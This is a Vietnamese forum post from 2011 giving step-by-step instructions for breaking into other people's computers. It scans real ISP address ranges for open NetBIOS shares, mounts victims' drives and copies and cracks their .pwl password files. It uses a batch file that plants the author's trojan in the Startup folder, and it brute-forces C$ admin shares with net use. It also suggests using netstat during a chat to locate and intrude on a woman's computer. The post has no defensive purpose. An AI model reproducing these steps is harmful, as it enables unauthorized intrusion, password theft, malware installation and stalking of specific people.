---------------------------------------------------------

Chào mừng bạn đến với diễn đàn Công Nghệ Thông Tin CK08 Ca Mau Community College.
Hy vọng diễn đàn sẽ là nơi giao lưu học hỏi và chia sẽ niềm đam mê tri thức.
Chúc bạn một ngày an lành và vui vẻ và luôn thành công trong cuộc sống.
################################


 
Trang ChínhTrợ giúpTìm kiếmThành viênĐăng kýĐăng Nhập

Share | 
 

 Các kỹ thuật cơ bản tấn công máy tính từ thấp đến nâng cao (P1)

Go down 
Tác giảThông điệp
truyenITPro
Moderator
Moderator
avatar

Tổng số bài gửi : 153
Join date : 13/07/2011
Age : 29
Đến từ : Phú Hưng - Cái Nước - Cà Mau

Bài gửiTiêu đề: Các kỹ thuật cơ bản tấn công máy tính từ thấp đến nâng cao (P1)   Sat Jul 23, 2011 6:54 pm


- Sau khi cài đặt mở ENT3 lên, trong tab NBScan gõ vào Starting IP Address một trong số những cổng sau : 203.162.50.1; 203.162.11.1; 203.162.46.1; 203.162.49.1; 203.162.60.1; 202.167.126.1; 202.167.120.1. Khi đó ở dòng Ending IP Address sẽ có dạng như sau; xxx.xxx.xx.255
- Click vô Start, Trên màn hình sẽ hiện ra những máy nằm trong vùng địa chỉ trên, nếu có chữ yes ở phần RS thì những máy đó có thể đột nhập vào được (NẾU MAY MẮN)(Những máy có thể vào thường có Workgroup là workgroup hoặc tên gì đó mà nghe có vẻ ngu ngu , đừng động vào máy có workgoup là DOMAIN hay SERVER)
- Click chuột phải vào máy ngu ngu đó rồi chọn Open Computer, rồi đó bây giờ bạn đã ngồi trong máy victim rồi muốn làm gì thì làm.

CHÔM PASSWORD PHỤC VỤ HỌC SINH SINH VIÊN NGHÈO


1. Làm tương tự như trên nhưng sau khi open computer được rùi thì close cái cửa sổ đó lại, sau đó click chuột phải vào các máy có chữ YES rồi chọn copy IP Address sau đó qua tab Shares trong phần Share name gõ vào \\xxx.xxx.xx.xxx\c\, trong phần Local drive chọn B (ổ nào cũng đươc), click vô Mount (chú ý nếu hiện lên thông báo “the network not starting….” thì phải qua tab NBScan chọn thằng victim đó rồi Open computer đợi cho đến khi hiện lên phần share của victim là được rồi có thể close nó lại, qua tab shares click Mount nếu hiện lên connect successfully thì OK rồi.
Bây giờ ổ B trên máy bạn đã là ổ C của máy victim rùi đó

DÙNG WINDOWS COMMANDER

1. Mở Windows Commander lên chọn ổ H, khà khà thằng vivtim đang dãy chết(bi giờ ổ C của nó là ổ B của mình rùi), vô Commandsà Search, trong search for type vô *.pwl, trong search in type H:\windowsà click Start search đợi cho ra mấy file *.pwl là stop ngay có đợi lâu cũng chẳng được gìà click vô feed to listbox, rồi đó bi giờ nó đã nằm trong listbox của mình, nhấn F5 để copy nó qua ổ cứng của mình vd: D:\ACC . XONG

2. Khi đã có file pwl trong tay bạn click vô nó(file pwl nằm trên ổ cứng của mình) (kiếm file nào mới nhất) thằng PWL tools demo sẽ nhảy ra làm phận sự của mình click vô SearchPasswordFast hì hì có ACC xài rùi(nhớ post lên cho anh em đấy nhé), nếu không có gì hihi chịu khó search tiếp file system.ini trong C:\windows (user name nằm trong này đó) type user name vừa tìm được vào phần user name của PWL Tools demo 6.5 àclick checkpassàok
3. Nếu bạn có trojan hãy copy vào thư mục starup
4. Cách này nhanh gấp 3 lần so với kiểu open computer đó J



DÙNG TẬP TIN ACC.BAT
Cách này cực kỳ nhanh gọn nhưng đòi hỏi phải biết chút ít về dos và .bat
Bạn tạo tập tin acc.bat có nội dung như sau :

copy d:\acc\system.ini + h:\windows\system.ini d:\acc\system.ini
copy h:\windows\*.pwl d:\acc
copy c:\windows\desktop\msconfigs.exe H:\WINDOWS\Startm~1\Programs\StartUp

msconfigs là con trojan của tui. Sau khi connect successfully bạn chỉ cần chạy acc.bat là tất cả đêu ok. Đó ai hiểu thì xài cách này nhanh gấp 6 lần so với cái kiểu open computer

Chú ý: Tôi không chịu trách nhiệm về những gì mà bài viết này gây ra

Nhớ là phải có trình đọc file PWL
Món này phù hợp cho việc đánh nhanh rút gọn, rề rà làm chậm luôn dàn máy victim





DOMAIN - Toàn quyền sử dụng tên miền
DOMAIN QUỐC TẾ - Giá rẻ & Toàn quyền sử dụng tên miền
DOMAIN VIỆT NAM - Giảm 30% từ đầu năm 2011






c:\netstat –n

Xâm nhập máy tính đang online là một kỹ thuật vừa dễ lại vừa khó ! Bạn có thể nói dễ khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách đáng kể và những máy họ không share thì không thể xâm nhập được, do đó, nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account , có một cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân không share là dùng chương trình DOS để tấn công .

Dùng chương trình Scan IP như ENT 3 để scan IP mục tiêu .
- Vào Start ==> Run, gõ lệnh cmd .

- Trong cửa sổ DOS hãy đánh lệnh “ net view (IP của nạn nhân) ”
VD : c:\net view 203.162.30.xx .

- Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá, bạn chỉ cần đánh tiếp lệnh net use (ổ đĩa bất kỳ trên máy của bạn) : (IP của nạn nhân) (ổ share của nạn nhân)
VD : c:\net use E : 203.162.30.xxC

- Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Password thì bạn hãy download chương trình dò password về sử dụng (theo tôi bạn hãy down chương trình “ pqwak2 ” áp dụng cho việc dò password trên máy sử dụng HĐH Win98 hoặc Winme và chương trình “ xIntruder ” dùng cho Win NT ).

Chú ý là về cách sử dụng thì hai chương trình tương tự nhau, dòng đầu ta đánh IP của nạn nhân , dòng thứ hai ta đánh tên ổ đĩa share của nạn nhân nhưng đối với “ xIntruder ” ta chú ý
chỉnh Delay của nó cho hợp lý , trong mạng LAN thì Delay của nó là 100 còn trong mạng Internet là trên dưới 5000 .

- Nếu máy của nạn nhân không có share thì ta đánh lệnh : net use (ổ đĩa bất kỳ trên máy của bạn) : (IP của nạn nhân) c$ (hoặc d$) " administrator "
VD : net use E : 203.162.30.xxC$" administrator "

Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là " administrator " .

- Chúng ta có thể áp dụng cách này để đột nhập vào máy của cô bạn mà mình “ thầm thương trộm nhớ ” để tìm những dữ liệu liên quan đến địa chỉ của cô nàng ( với điều kiện là cô ta đang dùng máy ở nhà và bạn may mắn khi tìm được địa chỉ đó ) .
Bạn chỉ cần chat Y!Mess rồi vào DOS đánh lệnh : c:\netstat –n

Khi dùng cách này bạn hãy tắt hết các cửa sổ khác chỉ để khung chat Y!Mess với cô ta thôi, nó sẽ giúp bạn dễ dàng hơn trong việc xác định địa chỉ IP của cô ta.
Rãnh post tiếp, giờ ôn bài rồi..

Theo "Sưu tầm + Kinh nghiệm xâm nhập nghiệp dư + Nghiên cứu " afro
Về Đầu Trang Go down
 
Các kỹ thuật cơ bản tấn công máy tính từ thấp đến nâng cao (P1)
Về Đầu Trang 
Trang 1 trong tổng số 1 trang

Permissions in this forum:Bạn không có quyền trả lời bài viết
 :: Hacker - Virus :: Thâm Nhập - bảo Mật-
Chuyển đến